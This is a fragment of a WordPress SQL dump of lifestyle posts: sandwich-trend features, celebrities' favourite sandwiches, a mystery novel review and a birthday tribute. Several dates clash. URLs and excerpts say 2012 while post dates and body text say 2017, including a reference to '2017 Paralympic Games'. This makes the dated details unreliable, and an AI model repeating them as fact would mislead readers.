16:41:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A bit of all white?\" st_url=\"http://westonspirit.org.uk/2012/05/a-bit-of-all-white/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A bit of all white?\" st_url=\"http://westonspirit.org.uk/2012/05/a-bit-of-all-white/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A bit of all white?\" st_url=\"http://westonspirit.org.uk/2012/05/a-bit-of-all-white/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A bit of all white?\" st_url=\"http://westonspirit.org.uk/2012/05/a-bit-of-all-white/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A bit of all white?\" st_url=\"http://westonspirit.org.uk/2012/05/a-bit-of-all-white/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s a sandwich – but not as we know it. Whether it’s to help our health or to ring the changes, many of us are starting to look beyond slices of the traditional family loaf at lunchtime.</h4>&#13;\n<p></p><div id=\"attachment_2049\" class=\"wp-caption alignright\" style=\"width: 310px\"><img class=\"size-full wp-image-2049\" title=\"111027_053_ChickenIceburg\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/111027_053_ChickenIceburg.jpg\" alt=\"\" width=\"300\" height=\"400\" /><p class=\"wp-caption-text\">Chicken and iceburg parcels are a healthy alternative</p></div>&#13;\n<p>Does the sandwich always have to be made from bread? A growing awareness of food intolerances and the quest for novelty mean new formats are making an appearance, from gluten-free to lettuce wraps, a stuffed croissant or the “wafflewich”, predicted to be the next American import to hit our shores.</p>&#13;\n<p>TV chef Phil Vickery, who is the national charity Coeliac UK’s food ambassador, says that foregoing gluten when choosing your bread does not mean missing out on taste.</p>&#13;\n<p>“I came across gluten-free by accident when developing a Christmas pudding and was unable to source flour,” he says. “I substituted rice flour in its place.”</p>&#13;\n<p>Vickery has since written two books of gluten-free recipes which incorporate ideas for quick chicken iceberg parcels  and a chestnut and roasted onion bread.</p>&#13;\n<p>The home-packed lunchbox has seen a plethora of other innovations, too. Baker Warburtons offers a range of Sandwich Pittas, Square(ish) Wraps and Sandwich Thins in brown, seeded and white varieties.</p>&#13;\n<p>“The sandwich alternative sector is seeing significant growth,” says marketing controller Megan Harrison. “We are working to satisfy consumer trends and provide many choices.”</p>&#13;\n<p>And change is seen on the high street, too. “The traditional, white triangular sandwich is dying,” says Paul May, CEO of the Patisserie Valerie chain.“Customers are looking for more variety – we are seeing a changing palate. They want handmade foods and artisan breads.”</p>&#13;\n<p>However, the British Sandwich Association (BSA) figures challenge the supposed fickle shopper. About 58 per cent of commercially bought sandwiches are made with traditional square bread, while the fast-growing wrap only represents 5 per cent of the market.</p>&#13;\n<p>Where the traditional sandwich may be under threat is from the growing preferences for gluten-free products, as hailed by Vickery.</p>&#13;\n<p>Next week (14-20 May) will see Coeliac UK’s Gluten-Free Challenge to raise awareness. The BSA is supporting it with a contest to create the perfect gluten-free beef sandwich, which will be featured on its <a href=\"http://www.lovesarnies.com/\" target=\"_blank\">www.Lovesarnies.com</a> website.</p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','A bit of all white?','It’s a sandwich – but not as we know it. Whether it’s to help our health or to ring the changes, many of us are starting to look beyond slices of the traditional family loaf at lunchtime, writes Stephanie Sparrow','publish','open','open','','a-bit-of-all-white','','','2018-04-02 20:06:21','2018-04-02 20:06:21','',0,'http://westonspirit.org.uk/a-bit-of-all-white.asp',0,'post','',0),(171,1,'2017-06-18 00:05:30','2017-06-18 00:05:30','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">15 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A matter of taste\" st_url=\"http://westonspirit.org.uk/2012/05/a-matter-of-taste/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A matter of taste\" st_url=\"http://westonspirit.org.uk/2012/05/a-matter-of-taste/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A matter of taste\" st_url=\"http://westonspirit.org.uk/2012/05/a-matter-of-taste/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A matter of taste\" st_url=\"http://westonspirit.org.uk/2012/05/a-matter-of-taste/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A matter of taste\" st_url=\"http://westonspirit.org.uk/2012/05/a-matter-of-taste/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Stephanie Sparrow takes the orders from some celebrity sandwich fans for their favourite bread-and-butter treats</h4>&#13;\n<p><strong><img class=\"alignright size-full wp-image-2017\" title=\"120685739\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/120685739.jpg\" alt=\"\" width=\"596\" height=\"431\" /><br /></strong></p>&#13;\n<p> </p>&#13;\n<p><strong><div class=\"woo-sc-box info   \">&#13;\n<p><strong><img class=\"alignright  wp-image-2024\" title=\"Earl of Sandwich\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/EARL_OF_SANDWICH-new.jpg\" alt=\"\" width=\"144\" height=\"151\" /></strong></p>&#13;\n<p><strong>John Montagu,</strong></p>&#13;\n<p><strong>11th Earl of Sandwich</strong></p>&#13;\n<p>We have always been aware of the history connected to the family name. One of the portraits of the famous 4th Earl shows him holding what looks like a white triangle and we have always joked that he is holding a sandwich; it was, in fact, the letter confirming the loss of the American War of Independence. My favourite sandwich has to be hot roast English beef with strong horseradish.</p>&#13;\n<p><strong><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><img class=\"alignright  wp-image-2023\" title=\"Paralympics GB 2008 Photocall - Birmingham National Indoor Arena\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Equestrian-Lee-Pearson-184.jpg\" alt=\"\" width=\"126\" height=\"189\" /></p>&#13;\n<p><strong>Lee Pearson, CBE,</strong></p>&#13;\n<p><strong>Paralympic gold medal winner and equestrian champion</strong></p>&#13;\n<div>&#13;\n<p>Coronation chicken is my favourite sandwich which the groom collects for me from Coffee Beans, a shop local to the stables in Leek. I’m very busy at the moment with the selection trials for the 2017 Paralympic Games in September so  it’s great to eat on the go.</p>&#13;\n<p><strong><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><strong>Lisa Faulkner,</strong></p>&#13;\n<p><img class=\" wp-image-2021  alignright\" title=\"Lisa Faulkner\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/HR-Debra-Hurford-Brown-Lisa-F-139.jpg\" alt=\"Publicity shot\" width=\"119\" height=\"176\" /></p>&#13;\n<p><strong>A</strong><strong>ctress, cookery author and Celebrity MasterChef 2010 champion</strong></p>&#13;\n<p><strong></strong>My grandparents had a beach hut at West Wittering and I distinctly remember a rainy Saturday lunchtime with the windbreaks up, my sister and I in our navy blue fishermen’s jumpers and wellies huddled together on deck chairs eating sandwiches (hers corned beef and tomato, mine corned beef and piccalilli). The bread was always good old “plastic” white sliced and the corned beef tinned, but the tomatoes were grown in her greenhouse and the piccalilli was home-made.</p>&#13;\n<p><strong><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><strong>Paul Hollywood,</strong></p>&#13;\n<p><img class=\"alignright  wp-image-2019\" title=\"Paul Hollywood\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Paul-Hollywood.jpg\" alt=\"\" width=\"180\" height=\"120\" /></p>&#13;\n<p><strong>Artisan baker and judge of The Great British Bake Off</strong></p>&#13;\n<p>I cannot resist a club sandwich. I love the fact it is laden with fillings and needs a daft cocktail stick to hold it together.  The best club sandwich should be on toasted, fresh, white bread, in two tiers and filled to bursting point with seasoned turkey breast, crispy maple bacon, chopped romaine lettuce, slices of ripe tomato and red onion and lashings of mayonnaise with a side order of handmade crisps.</p>&#13;\n<p><strong><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<p><strong>Nicola Horlick,</strong></p>&#13;\n<p><img class=\"alignright  wp-image-2022\" title=\"Bramdean (Bramdiva).\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Nicola-Horlick.jpg\" alt=\"\" width=\"180\" height=\"120\" /></p>&#13;\n<p><strong>Financier and restaurateur</strong></p>&#13;\n<p>My favourite sandwich is made with the best quality smoked salmon, good butter, fresh wholemeal bread, a twist of black pepper and a squeeze of lemon. When I started my career in the City, today’s choice of sandwich vendors didn’t exist so my boss used to send me on a half-mile walk to a fish restaurant for smoked salmon sandwiches. We are about to open a new restaurant called Georgina’s, named after my daughter who died of leukaemia at the age of 12 in 1998. Her favourite sandwich was a BLT, so we will have a special version on offer.</p>&#13;\n</div> <div class=\"woo-sc-hr\"></div>&#13;\n</div>&#13;\n									</strong></p></div>','A matter of taste','Stephanie Sparrow takes the orders from some celebrity sandwich fans for their favourite bread-and-butter treats','publish','open','open','','a-matter-of-taste','','','2018-04-02 20:06:19','2018-04-02 20:06:19','',0,'http://westonspirit.org.uk/a-matter-of-taste.asp',0,'post','',0),(172,1,'2015-05-08 21:33:09','2015-05-08 21:33:09','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> ojones\" title=\"Posts by Olga B. Jones\" rel=\"author\"&gt;Olga B. Jones</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bibliophile’s Corner.  A Will To Murder by Hilary Thomson\" st_url=\"http://westonspirit.org.uk/2012/05/bibliophiles-courner-a-will-to-murder-by-hilary-thomson/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bibliophile’s Corner.  A Will To Murder by Hilary Thomson\" st_url=\"http://westonspirit.org.uk/2012/05/bibliophiles-courner-a-will-to-murder-by-hilary-thomson/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bibliophile’s Corner.  A Will To Murder by Hilary Thomson\" st_url=\"http://westonspirit.org.uk/2012/05/bibliophiles-courner-a-will-to-murder-by-hilary-thomson/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bibliophile’s Corner.  A Will To Murder by Hilary Thomson\" st_url=\"http://westonspirit.org.uk/2012/05/bibliophiles-courner-a-will-to-murder-by-hilary-thomson/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bibliophile’s Corner.  A Will To Murder by Hilary Thomson\" st_url=\"http://westonspirit.org.uk/2012/05/bibliophiles-courner-a-will-to-murder-by-hilary-thomson/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><a href=\"http://bibliophilescorner.blogspot.co.uk/2012/05/review-will-to-murder-by-hilary-thomson.html\"><img class=\"alignright size-thumbnail wp-image-2109\" title=\"Profile large\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Profile-large-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a>When wealthy and eccentric patriarch James Boyle dies a peculiar death, the DA declines to investigate, convinced that the victim died of natural causes. Yet even the police are stunned when members of the Boyle family gather at the estate of Rollingwood for the reading of James’ will – and begin to die, one at a time. Only when long-lost relative Bradley Smith appears, along with reporter Eric Maxwell, do the mysterious deaths finally receive a proper investigation. Even so, no one is prepared for the lunacy that hides beneath the mansion’s bizarre facade.</p>&#13;\n<p>The cover of this book intrigued me. Edward Steichen’s famous photograph of actress Gloria Swanson promised a story from the flapper era and the font of the title and author’s name reminded me of works that have to do with mysticism, so it’s no wonder I expected an old-fashioned mystery with maybe some ghosts or at least a nice spooky séance. Out of these three I only got the old-fashioned mystery, and then only partially. </p>&#13;\n<p>From the very beginning I could see that this book resembles one of Agatha Christie’s cozy mysteries and the small-town setting, the multiple suspects who all have a motive, the extremely rich family with many secrets, and the amateur detective who just happens to be at the right place at the right time immediately endeared it to me. Another thing I saw right away was that the author has a real knack for setting the scene and characterization: in just a few short paragraphs I knew what sort of man James Boyle was and understood his reactions to what was going on. In fact, this continued throughout the book with the rest of the characters as well and made the book that much more enjoyable. I did have some trouble deciding at first when the book was set because the elderly gentleman in his bowler hat being driven around by a chauffeur hinted at a historical mystery but the clearly modern details indicated a much more recent time. The writing also reminded me of a bygone era with its thorough descriptions of places and people as well as a level of familiarity that never crossed into the intimate as it often does nowadays. <br />I appreciated the idea of having a portion of the story told from the point of view of a child. This provides a perspective an adult wouldn’t have and Ms. Thomson seems to have a pretty good grasp on the complexities of a child’s life to which we adults are often oblivious. I even missed the boy telling his version of the story when it was the adult’s turn. </p>&#13;\n<p>One of the things that pleasantly surprised me was how funny this book was. On one hand there’s nothing humorous about death but the characters and their interactions brought me so many laughs I’m tempted to categorize this book as a satirical mystery. Not only is the dialogue clever, but the author managed to present her characters’ peculiarities with such keen attention to detail that I applaud her for how observant she is and for her skill in bringing it to the page. </p>&#13;\n<p>One of the things that dampened my enthusiasm for this book had to do with connecting the dots of the plot. It just didn’t flow as smoothly as I would have liked it to. For example there was the matter of Eric’s girlfriend appearing in the beginning of the book in a seemingly non-sequential role and then halfway through it turns out that somehow she’s become an influential figure. I really did a double-take because I had no idea how that happened. The characters being alternately referred to by their first and last names was also troublesome. I’m not very good with names to begin with so feeling like an already populous cast has suddenly doubled did nothing for my comfort level. I often had to reread the paragraphs to figure out who was who and what it is they were doing. </p>&#13;\n<p>A good mystery is supposed to leave the reader suspecting at least a few people and A Will To Murder succeeded at that. I of course got it all wrong, as usual, although in hindsight the identity of the murderer shouldn’t have surprised me as much as it did. Oh well, better luck next time.<br />This was a very enjoyable and quick read and I would readily recommend it to any fan of mystery, especially one who can appreciate a few laughs on the side. </p>&#13;\n<p> <img class=\"alignnone size-thumbnail wp-image-2110\" title=\"A-Will-to-Murder-350x438\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/A-Will-to-Murder-350x438-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" />  My rating: 4                                                                                     </p>&#13;\n									</div>','Bibliophile’s Corner.  A Will To Murder by Hilary Thomson','When wealthy and eccentric patriarch James Boyle dies a peculiar death, the DA declines to investigate, convinced that the victim died of natural causes. Yet','publish','open','open','','bibliophiles-corner-a-will-to-murder-by-hilary-thomson','','','2018-04-02 20:06:18','2018-04-02 20:06:18','',0,'http://westonspirit.org.uk/bibliophiles-corner-a-will-to-murder-by-hilary-thomson.asp',0,'post','',0),(173,1,'2015-01-29 23:32:36','2015-01-29 23:32:36','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bite into a birthday\" st_url=\"http://westonspirit.org.uk/2012/05/bite-into-a-birthday/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bite into a birthday\" st_url=\"http://westonspirit.org.uk/2012/05/bite-into-a-birthday/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bite into a birthday\" st_url=\"http://westonspirit.org.uk/2012/05/bite-into-a-birthday/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bite into a birthday\" st_url=\"http://westonspirit.org.uk/2012/05/bite-into-a-birthday/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bite into a birthday\" st_url=\"http://westonspirit.org.uk/2012/05/bite-into-a-birthday/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Bring out the bunting – it’s the anniversary of the invention of the sandwich!</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2074\" title=\"96900157\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/96900157.jpg\" alt=\"\" width=\"300\" height=\"617\" />Residents of the Kent town of Sandwich are planning to host a very special birthday party. And it’s fair to say they’ll be celebrating the event with some relish.</p>&#13;\n<p>This weekend (12-13 May) the Sandwich Celebration will mark the creation of the sandwich 250 years ago by John Montagu, Earl of Sandwich – naval commander, explorer and notorious gambler.</p>&#13;\n<p>The celebration, appropriately presided over by the present earl, includes a re-enactment of the moment when the earl, in the organisers’ words, “had the masterly inspiration of creating the universal fast food the world knows and loves”. There will also be a teddy bears picnic for young fans and a Sandwich Bites competition to find the most delicious snack. And expect some healthy competition when visitors from French twin town Honfleur arrive for a tasting competition, with the English sandwich judged against the French baguette.</p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Bite into a birthday','Bring out the bunting – it’s the anniversary of the invention of the sandwich','publish','open','open','','bite-into-a-birthday','','','2018-04-02 20:06:16','2018-04-02 20:06:16','',0,'http://westonspirit.org.uk/bite-into-a-birthday.asp',0,'post','',0),(174,1,'2017-07-08 18:40:25','2017-07-08 18:40:25','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up and Go – Sandwich Special\" st_url=\"http://westonspirit.org.uk/2012/05/get-up-and-go-sandwich-special/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up and Go – Sandwich Special\" st_url=\"http://westonspirit.org.uk/2012/05/get-up-and-go-sandwich-special/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up and Go – Sandwich Special\" st_url=\"http://westonspirit.org.uk/2012/05/get-up-and-go-sandwich-special/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up and Go – Sandwich Special\" st_url=\"http://westonspirit.org.uk/2012/05/get-up-and-go-sandwich-special/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up and Go – Sandwich Special\" st_url=\"http://westonspirit.org.uk/2012/05/get-up-and-go-sandwich-special/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><em>This Weston Spirit</em> special celebrates 250 years of the sandwich – born in Britain and enjoyed around the world. Read about the history of our favourite snack, top chefs including Gary Rhodes put a fresh spin on old favourites, and we show you new and healthy ways to transform the humble sarnie.</p>&#13;\n<p>Distributed with <em>The Guardian</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120511101056-e3cdc42b8b284adbb4636d021bec54f9&amp;docName=getupsandwichspecial&amp;username=Lyonsdown&amp;loadingInfoText=Get%20Up%20Sandwich%20Special&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120511101056-e3cdc42b8b284adbb4636d021bec54f9&amp;docName=getupsandwichspecial&amp;username=Lyonsdown&amp;loadingInfoText=Get%20Up%20Sandwich%20Special&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h4><a href=\"http://www.ewartshaw.co.uk/financepublications/2012/sandwiches2012.pdf\" target=\"_blank\">Download the PDF</a></h4>&#13;\n									</div>','Get Up and Go - Sandwich Special','This Get up and go special celebrates 250 years of the sandwich – born in Britain and enjoyed around the world. Read about the history of our favourite snack,','publish','open','open','','get-up-and-go-sandwich-special','','','2018-04-02 20:06:15','2018-04-02 20:06:15','',0,'http://westonspirit.org.uk/get-up-and-go-sandwich-special.asp',0,'post','',0),(175,1,'2017-07-28 18:55:08','2017-07-28 18:55:08','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"In for the fill\" st_url=\"http://westonspirit.org.uk/2012/05/in-for-the-fill/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"In for the fill\" st_url=\"http://westonspirit.org.uk/2012/05/in-for-the-fill/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"In for the fill\" st_url=\"http://westonspirit.org.uk/2012/05/in-for-the-fill/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"In for the fill\" st_url=\"http://westonspirit.org.uk/2012/05/in-for-the-fill/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"In for the fill\" st_url=\"http://westonspirit.org.uk/2012/05/in-for-the-fill/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Whether it’s a familiar favourite or a taste of the exotic, sandwich fillings can help fill the gaps left as we tighten our belts in austerity. By Stephanie Sparrow</h4>&#13;\n<p></p><div id=\"attachment_2059\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\" wp-image-2059 \" title=\"Eat -Cubano_2229_1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/Eat-Cubano_2229_1.jpg\" alt=\"Eat’s new Cubano toastie\" width=\"358\" height=\"250\" /><p class=\"wp-caption-text\">Eat’s new Cubano toastie</p></div>&#13;\n<p>In harsh economic times, the versatility of the sandwich comes into its own. Its contents can be comforting, according to Neil Brownbill, marketing director for food firm Princes.</p>&#13;\n<p>“We’re seeing a trend for people seeking familiarity, opting for food and flavours they know,” he says. Princes has responded by offering the nation’s favourite dishes in a paste with its British Classics range – including baked beans and chicken tikka flavours – which is packaged with a Union flag theme.</p>&#13;\n<p>Eating out has become a rare treat for most, leaving those who want to try different cuisines to sample them in a sandwich, not at a restaurant table.</p>&#13;\n<p>“Many consumers are stuck between low confidence reining in the likelihood of making adventurous choices, and a growing semblance of ‘recession fatigue’,” says Helena Spicer, senior foodservice analyst at market researcher Mintel.</p>&#13;\n<p>“As such, there has been an explosion of more exotic flavour options in familiar formats such as sandwiches.”</p>&#13;\n<p>Faith MacArthur, founder and brand director of Eat, which makes and sells 10m sandwich products a year, agrees. “There is definitely a move to innovative tastes,” she says.</p>&#13;\n<p>The economy may be acontributing factor, she adds, explaining that we are looking for low-risk ways to colour to our lives – or at least our lunch breaks. “People don’t always want to be austere with eating habits.”</p>&#13;\n<p>Eat has just launched a Vietnamese chicken and chilli baguette known as the Chicken Banh Mi and the Cubano, a cheese, ham, pork and dill pickle toastie.</p>&#13;\n<p>The popularity of tangy pickles disputes the British reputation for bland tastes. “We don’t pare back for the British palate,” says MacArthur. “Customers want to taste real flavours, which they may have come across when they were travelling, for example.”</p>&#13;\n<p>A similar mood is seen in home-filled sandwiches. “Increased foreign travel has exposed consumers to new foods, and awakened their interest in authentic flavours,” says Rob Cottam, head development chef at the English Provender Company, which sells 440,000 jars of condiments a year.</p>&#13;\n<p>One of its best-sellers is the preservative-free Hot Horseradish which can pep up relatively inexpensive ingredients such as smoked mackerel or cold meats.</p>&#13;\n<p>Cottam makes a case for using condiments to create glamorous sandwiches from the remnants of a Sunday roast or a dinner party. “Our caramelised red onion chutney works well with left-over cheese,” he says.</p>&#13;\n<p>Austerity chic in the kitchen means consumers are looking to create a gourmet tastes without breaking the bank. Which could be why chutneys and conserves are making a comeback, says food futurologist and academic Dr Morgaine Gaye.</p>&#13;\n<p>“Remember bread and jam in the 1960s and 70s? We are going to see a new sexed-up version of that,” she says, “such as gourmet preserve with a nut butter.”</p>&#13;\n<p>Jam could be a low-key way of joining this year’s patriotic celebrations, too – Tiptree Jubilee Jam is made from the strawberry of that name, while Marks &amp; Spencer’s classic jam sandwich for the royal occasion comes in at a rather budget-friendly £1.25. </p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','In for the fill','Whether it’s a familiar favourite or a taste of the exotic, sandwich fillings can help fill the gaps left as we tighten our belts in austerity. By Stephanie Sparrow','publish','open','open','','in-for-the-fill','','','2018-04-02 20:06:13','2018-04-02 20:06:13','',0,'http://westonspirit.org.uk/in-for-the-fill.asp',0,'post','',0),(176,1,'2017-12-30 02:49:47','2017-12-30 02:49:47','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">17 May 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"In Honor of “Older Americans” Month – Happy 80th Birthday, Mom\" st_url=\"http://westonspirit.org.uk/2012/05/in-honor-of-older-americans-month-happy-80th-birthday-mom/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"In Honor of “Older Americans” Month – Happy 80th Birthday, Mom\" st_url=\"http://westonspirit.org.uk/2012/05/in-honor-of-older-americans-month-happy-80th-birthday-mom/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"In Honor of “Older Americans” Month – Happy 80th Birthday, Mom\" st_url=\"http://westonspirit.org.uk/2012/05/in-honor-of-older-americans-month-happy-80th-birthday-mom/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"In Honor of “Older Americans” Month – Happy 80th Birthday, Mom\" st_url=\"http://westonspirit.org.uk/2012/05/in-honor-of-older-americans-month-happy-80th-birthday-mom/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"In Honor of “Older Americans” Month – Happy 80th Birthday, Mom\" st_url=\"http://westonspirit.org.uk/2012/05/in-honor-of-older-americans-month-happy-80th-birthday-mom/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<div class=\"mceTemp\">&#13;\n<dl id=\"attachment_2101\" class=\"wp-caption alignright\" style=\"width: 190px;\"><dt class=\"wp-caption-dt\"><a href=\"http://boomercareermakeover.com/2012/05/15/in-honor-of-older-americans-month-happy-80th-birthday-mom/\"><img class=\" wp-image-2101\" title=\"023efa3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/05/023efa31-300x300.jpg\" alt=\"\" width=\"180\" height=\"180\" /></a></dt>&#13;\n<dd class=\"wp-caption-dd\">Alissa Searcy</dd>&#13;\n</dl><p>May is “Older Americans” month, and the theme for 2017 is “It’s never too late to play”.   Today happens to be my mother’s 80th birthday, but she is too busy to “play”.   She is the CFO of a 40-year old family-owned business, and she is one busy woman.  My father is just as busy as the CEO.  My parents are a true inspiration to me, and in honor of “Older Americans” month, I would like to say thank you to both of them.  Beyond my parents, I would like to say thank you to all “Older Americans”.  Thank you for helping to make this country a great place to live.</p>&#13;\n</div>&#13;\n<p>I asked my mother if turning 80 has changed her outlook on the concept of retiring.  She gave the same response as always – “I plan to die at my desk”.  However, she has no intentions of dying before she is at least 100.  In her eyes, working is what keeps her feeling youthful.  Even though she can afford to retire very comfortably, she views retirement as the equivalent of her downfall from “boredom”, as she puts it.</p>&#13;\n<p>For many years, I tried to convince my parents to retire and enjoy life.  Eventually, I realized that they are enjoying life!  If running their business makes them happy, who am I to argue?  The definition of “play” is a personal one, I suppose.  I wonder how many other 80-year old Americans are still working because they enjoy it, and not because they need to for financial reasons.</p>&#13;\n<p>To all “Older Americans, thank you for all the contributions you have made to this great Country, which is only great because of those with wisdom and courage, strength and determination to overcome adversity and to pave the way for the youth of America to be stronger.</p>&#13;\n<p>Happy Birthday, Mom!  You are a constant inspiration to me.</p>&#13;\n<p>Be strong!</p>&#13;\n<p>Alissa</p><div class=\"woo-sc-hr\"></div>&#13;\n<p> </p>&#13;\n									</div>','In Honor of “Older Americans” Month – Happy 80th Birthday, Mom','May is “Older Americans” month, and the theme for 2012 is “It’s never too late to play”. Thank you for helping to make this country a great place to live','publish','open','open','','in-honor-of-older-americans-month-happy-80th-birthday-mom','','','2018-04-02 20:06:11','2018-04-02 20:06:11','',0,'http://westonspirit.org.uk/in-honor-of-older-americans-month-happy-80th-birthday-mom.asp',0,'post','',0),(177,1,'2015-04-11 18:38:05','2015-04-11 18:38:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">11 May 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Labelled with love\" st_url=\"http://westonspirit.org.uk/2012/05/labelled-with-love/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" 